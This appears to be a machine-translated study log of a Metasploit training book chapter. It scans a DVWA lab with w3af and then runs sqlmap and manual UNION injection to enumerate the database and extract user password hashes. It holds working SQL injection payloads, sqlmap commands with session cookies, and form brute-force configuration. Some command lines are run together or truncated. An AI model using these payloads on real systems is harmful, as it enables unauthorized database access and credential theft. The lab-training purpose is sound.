p128 WMAP
Like yesterday, I use these vulnerability scanning tools to sweep testfire.net or OWASPBWA can not sweep the loopholes! Don't understand!
Added: The network did not know when it broke. The scan was successful after the connection:
p134 Scan Magic W3af
# W3AF_CONSOLEW3AF>>>PLUGINSW3AF/plugins>>>bruteforce Form_auth W3af/plugins>>>bruteforce config Form_auth w3af/plugins/bruteforce/config:form_auth>>> Set passwdfile/usr/share/w3af/w3af/core/controllers/bruteforce/passwords.txt W3af/plugins/bruteforce/config:form_auth>>> Set usersfile/usr/share/w3af/w3af/core/controllers/bruteforce/Users.txt W3af/plugins/bruteforce/config:form_auth>>>BACKW3AF/plugins>>>Audit XSS Sqli
W3AF/plugins>>>Discovery webspiderunknown Command'Discovery'W3AF/plugins>>> Help|-----------------------------------------------------------------------------|| List | List available plugins. || -----------------------------------------------------------------------------|| Back | Go to the previous menu. || Exit | Exit W3af. || -----------------------------------------------------------------------------|| Audit | View, configure and enable Audit Plugins | | Infrastructure | View, configure and enable Infrastructure Plugins | |grep| View, configure and enablegrepPlugins | | Crawl | View, configure and enable crawl Plugins | | Evasion | View, configure and enable evasion plugins | | Bruteforce | View, configure and enable Bruteforce plugins | | Auth | View, configure and enable Auth plugins | | Output | View, configure and enable output plugins | | mangle | View, configure and enable Mangle plugins | | -----------------------------------------------------------------------------|
It seems that the discovery module is not in the book. Check online, Discovery module changed to crawl module. Go on:
W3af/plugins>>> Crawl web_spider w3af/plugins>>> crawl config web_spider w3af/ Plugins/crawl/config:web_spider>>> set Only_forward True w3af/plugins/crawl/config:web_spider >>> backthe Configuration had been saved.w3af/plugins>>> back
Basic function Configuration Complete! Continue to configure the target and result storage forms for the scan:
w3af>>> targetw3af/config:target>>> set Target http://www.dvssc.com/dvwa/ index.phpw3af/config:target>>> backthe configuration has been saved.w3af>>> PLUGINSW3AF/plugins>>> output html_file w3af/plugins>>> output config html_file W3AF/plugins/output/config:html_file>>> set verbose True w3af/plugins/output/config:html_ File>>> backthe configuration has been saved.w3af/plugins>>> back
W3af>>> Star
Sweep to Result:
p137 SQL Injection Vulnerability detection
In the Kali 2.0
MSF > Use auxiliary/scanner/http/sqlmap[–] Failed to load Module:auxiliary/scanner/http/sqlmap
It seems that the module has been deleted. Simply use the Sqlmap directly within the terminal.
Install a Firefox plugin, called Tamper Data, that can be used to view and change parameters that the Web app submits in the background, such as post parameters, cookie values, and so on.
By injecting the SQL injection training page that is logged in as admin to dvssc.com.
Submit arbitrary data, use tamper data to intercept URLs and cookies, and then use
' http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=a&Submit=Submit# ' --cookie='security=low; Phpsessid=ov3jmigsemo6d47367co53qq24'
Get results:
Parameter:ID(GET) Type:boolean-based Blind Title:or boolean-based Blind-WHERE or HAVING clause (MySQL comment) Payload:ID=-3209'OR 1543=1543#&submit=submitType:error-based Title:mysql OR error-based-WHERE or HAVING clause Payload:ID=-3023'OR 1 GROUP by CONCAT (0x7178716a71, (SELECT (4203=4203 and then 1 ELSE 0 END)), 0x7178627671,floor (RAND (0))) H AVING MIN (0) #&submit=submitType:and/or Time-based Blind Title:mysql>=5.0. Aand Time-based Blind (SELECT-comment) Payload:ID=a'and (SELECT * FROM (SELECT (SLEEP (5))) fhge) #&submit=submittype:union Query title:mysql UNION query (NULL)-2columns Payload:ID=a'UNION all SELECT CONCAT (0x7178716a71, 0x4e4b7872695163554f65444d6e4a4f59764f54616879767062516e576373624d726e545a6b727472,0x7178627671),NULL#& Submit=submit---[ A: +: the] [INFO] the back-End DBMS is mysqlweb server operating system:linux Ubuntu10.04(Lucid Lynx) Web application technology:php5.3.2Apache2.2. - Back-end Dbms:mysql5.0. A[ A: +: the] [INFO] fetched data logged to text files under'/root/.sqlmap/output/www.dvssc.com'[*] shutting down at A: +: the
Next, explore the database name in MySQL that holds the web app data. Simply add--dbs (probe database name) and-V 0 (verbose level) at the end of the previous command:
' http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=bb&Submit=Submit# ' --cookie='security=low; Phpsessid=ov3jmigsemo6d47367co53qq24'0--snip--available databases [2 ]:[*] dvwa[*] information_schema[::
INFORMATION_SCHEMA is the default system database for MySQL, so let's focus on DVWA and probe the table names that exist:
# Sqlmap-u'http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=bb&Submit=Submit#'--cookie='Security=low; Phpsessid=ov3jmigsemo6d47367co53qq24'-D DVWA--Tables--snip--[ A: *: Wu] [INFO] fetching tables forDatabase'Dvwa'[ A: *: Wu] [WARNING] reflective value (s) found and filtering outdatabase:dvwa[2Tables]+-----------+| Guestbook | | Users |+-----------+
Probe the list of fields in users and discover that there is a password, haha! Get the contents out:
# sqlmap-u " http://www.dvssc.com/dvwa/ vulnerabilities/sqli/?id=bb&submit=submit# "--cookie= '
View Users.csv, inside the password of the admin through MD5 encryption, Google will know the password is the admin.
p150 SQL injection Instance Analysis
To log in to Www.dvssc.com's SQL injection training interface, first set the security level to a minimum.
When using union injection, if the number of columns is different from the actual table, the error is:
such as injecting
' UNION SELECT 1,2,3-- '
Error
SELECT Number of columns
Continue, by querying the INFORMATION_SCHEMA system table, you can see the name of each table in the MySQL database and the name of each column, and so on:
'(the last comment symbol--and ' There's a space between the lines! )
' UNION SELECT 1, column_name from Information_schema.column WHERE table_name= ' users '--'
' UNION SELECT 1, password from users-'
' UNION SELECT password, concat (first_name, ', last_name, ', user) from users--' (Through the concat () function to get more information)
The fourth chapter of the Metasploit Devil Training Camp (top)